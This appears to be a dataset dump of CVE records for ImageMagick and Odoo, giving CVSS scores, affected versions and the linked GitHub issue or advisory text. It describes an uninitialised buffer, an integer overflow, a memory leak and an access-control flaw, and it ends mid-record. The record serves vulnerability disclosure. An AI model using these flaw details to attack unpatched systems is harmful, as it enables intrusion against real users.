<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
- Environment (Operating system, version and so on):
- Additional information:
<!-- Thanks for reporting the issue to ImageMagick! -->
| Memory leak in ReadBMPImage in coder/bmp.c and ReadVIFFImage in coder/viff.c. | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1600/comments | 2 | 2019-06-18T10:55:16Z | 2019-07-03T01:29:51Z | https://github.com/ImageMagick/ImageMagick/issues/1600 | 457,401,228 | 1,600 |
CVE-2019-13135 | 2019-07-01T20:15:11.337 | ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/cdb383749ef7b68a38891440af8cc23e0115306d"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1599"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/1e59b29e520d2beab73e8c78aacd5f1c0d76196d"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://support.f5.com/csp/article/K20336394"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://support.f5.com/csp/article/K20336394?utm_source=f5support&%3Butm_medium=RSS"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA",
"versionEndExcluding": "6.9.10-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5",
"versionEndExcluding": "7.0.8-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "35364557-83E3-4807-8D93-84BF17E01075",
"versionEndExcluding": "11.6.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "11.5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D3F7911-FB00-4612-9109-9E7A407BC7B7",
"versionEndExcluding": "12.1.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "12.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B547F46F-5563-4E7F-8B69-3D25C6C58521",
"versionEndExcluding": "13.1.3.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1261AE74-41AF-4848-9AD9-46918C46845B",
"versionEndExcluding": "14.1.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "14.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1549C41F-9467-42C6-AF4B-644900495590",
"versionEndExcluding": "15.0.1.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "15.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "45920B7E-10A6-4066-87AB-60D584689891",
"versionEndExcluding": "15.1.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "15.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DC9ED27E-9096-4A7D-96A7-E3F47E747D73",
"versionEndExcluding": "11.6.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "11.5.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02CB8916-A9ED-4935-BFBD-5C9E8D45379E",
"versionEndExcluding": "12.1.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "12.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5853A161-2F92-4298-A70A-03A66DED157C",
"versionEndExcluding": "13.1.3.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C65C13-C852-4A12-BFC0-A4DB201FFCAF",
"versionEndExcluding": "14.1.2.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "14.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDE4FB3F-887D-48FC-B5F7-E06FA8AAEF30",
"versionEndExcluding": "15.0.1.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "15.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0064DE79-D6D6-4AE0-BF10-BF91FF9158DF",
"versionEndExcluding": "15.1.0.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "15.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1599 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ y ] I have written a descriptive issue title
- [ y ] I have verified that I am using the latest version of ImageMagick
- [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
```
/* ----- Load RLE compressed raster ----- */
BImgBuff=(unsigned char *) AcquireQuantumMemory((size_t) ldblk,
sizeof(*BImgBuff)); /*Ldblk was set in the check phase*/
if(BImgBuff==NULL) goto NoMemory;
offset=SeekBlob(image,6 /*sizeof(Header)*/,SEEK_SET);
```
(https://github.com/ImageMagick/ImageMagick/blob/master/coders/cut.c#L552)
We should initialize the BImgBuff, otherwise an use-of-uninitialized vulnerability occurs, which is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6780 (fixed in https://github.com/ImageMagick/ImageMagick/commit/a85ab26099152be3dab0bd377670abfc815b9fe7 and https://github.com/ImageMagick/ImageMagick/commit/81bfff2759854654bf07e452bf3b9b329f3c55e5 ) and https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5710 (fixed in https://github.com/ImageMagick/ImageMagick/commit/ce433f8048b120b2a0413b4ac3ef59fca35a9788 and https://github.com/ImageMagick/ImageMagick/commit/81bfff2759854654bf07e452bf3b9b329f3c55e5).
<!-- Thanks for reporting the issue to ImageMagick! -->
| Use of uninitialized value in function ReadCUTImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1599/comments | 2 | 2019-06-18T10:33:40Z | 2019-07-03T01:30:23Z | https://github.com/ImageMagick/ImageMagick/issues/1599 | 457,391,875 | 1,599 |
CVE-2019-13136 | 2019-07-01T20:15:11.417 | ImageMagick before 7.0.8-50 has an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/fe5f4b85e6b1b54d3b4588a77133c06ade46d891"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1602"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://support.f5.com/csp/article/K03512441?utm_source=f5support&%3Butm_medium=RSS"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "024CF82C-BA9A-441D-80DD-BDA9FEC819A7",
"versionEndExcluding": "7.0.8-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1602 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ y ] I have written a descriptive issue title
- [ y ] I have verified that I am using the latest version of ImageMagick
- [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a possible integer overflow vulnerability in TIFFSeekCustomStream in coder/tiff.c
```
case SEEK_CUR:
{
if ((profile->offset+offset) < 0)
return(-1);
profile->offset+=offset;
break;
}
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/tiff.c#L259
This issue is similar to the one which was fixed in https://github.com/ImageMagick/ImageMagick/commit/8b28a8708ca994c7c9f211d562a8109621cf4d15 and https://github.com/ImageMagick/ImageMagick/commit/114be1716d0a8a10df6f772ef558968a2ad9ab68.
| Possible integer overflow in TIFFSeekCustomStream in coder/tiff.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1602/comments | 2 | 2019-06-18T11:47:50Z | 2019-07-03T01:30:44Z | https://github.com/ImageMagick/ImageMagick/issues/1602 | 457,432,764 | 1,602 |
CVE-2019-13137 | 2019-07-01T20:15:11.493 | ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadPSImage in coders/ps.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/35ccb468ee2dcbe8ce9cf1e2f1957acc27f54c34"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1601"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/7d11230060fa9c8f67e53c85224daf6648805c7b"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA",
"versionEndExcluding": "6.9.10-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5",
"versionEndExcluding": "7.0.8-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1601 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is a memory leak issue in ReadPSImage in coder/ps.c
```
page_geometry=GetPageGeometry(option);
flags=ParseMetaGeometry(page_geometry,&page.x,&page.y,&page.width,
&page.height);
if (flags == NoValue)
{
(void) ThrowMagickException(exception,GetMagickModule(),OptionError,
"InvalidGeometry","`%s'",option);
image=DestroyImage(image);
return((Image *) NULL);
}
page.width=(size_t) ceil((double) (page.width*image->resolution.x/delta.x)
-0.5);
page.height=(size_t) ceil((double) (page.height*image->resolution.y/
delta.y) -0.5);
page_geometry=DestroyString(page_geometry);
fitPage=MagickTrue;
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/ps.c#L740
It is possible that page_geometry is not destroyed since there is a return statement before it.
It is the issue which is similar to the one fixed in https://github.com/ImageMagick/ImageMagick/commit/15be797d622655244e4c57cc5e9e4cba013011f8
| Memory leak in ReadPSImage in coder/ps.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1601/comments | 2 | 2019-06-18T11:02:58Z | 2019-07-03T01:31:05Z | https://github.com/ImageMagick/ImageMagick/issues/1601 | 457,404,400 | 1,601 |
CVE-2018-14866 | 2019-07-03T18:15:10.317 | Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32509"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32509 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-9
Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Core
**Credits**: Florent de Labarre
**CVE ID**: [CVE-2018-14866](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14866)
## I. Background
The Odoo framework includes a mechanism for managing temporary records, known as
TransientModels, for the purpose of containing transient data while a certain
screen or operation is in progress. Such records are regularly deleted by a
garbage collector job.
The security model for regulating access to TransientModels is different from
regular non-transient ones, in that there are not customizable access rights.
A default, hardcoded security policy makes those transient records accessible
only to the user who created them (the owner), and to the administrator.
## II. Problem Description
The implementation of the security model for TransientModels was incomplete,
to the effect that some operations were possible by users on transient
records that they did not own.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: Unprivileged user account required
**CVSS3 Score**: Low :: 3.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)
An attacker with an unprivileged user account (even portal users) may be able to
retrieve values of fields from transient records that they did not own, via
specially crafted RPC requests, in the interval between their creation and the
automatic garbage collection.
Such transient records may include limited business or sensitive data that
should not have been accessible to the attacker.
Exploitation would however be difficult in practice, limited by the need to
actually have TransientModels that include sensitive data (which depends on
installed modules), by the need to have a privileged user populate transient
records with the data, and by the need to execute the attack in the limited time
window before the automatic garbage collection.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is known, so applying the patch or updating is strongly
recommended.
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 67bf250ea5035e2e8e4da7e32f2671beb75cfab4
- 10.0: e93fa785629500e997330731d84853eb2edac299
- 11.0: 4b1b70a77a482926aa87503a8ef9d0aec5c5293f
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-9 (CVE-2018-14866) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32509/comments | 0 | 2019-04-08T13:37:46Z | 2019-04-08T13:37:49Z | https://github.com/odoo/odoo/issues/32509 | 430,456,694 | 32,509 |
CVE-2018-14861 | 2019-07-03T19:15:10.503 | Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
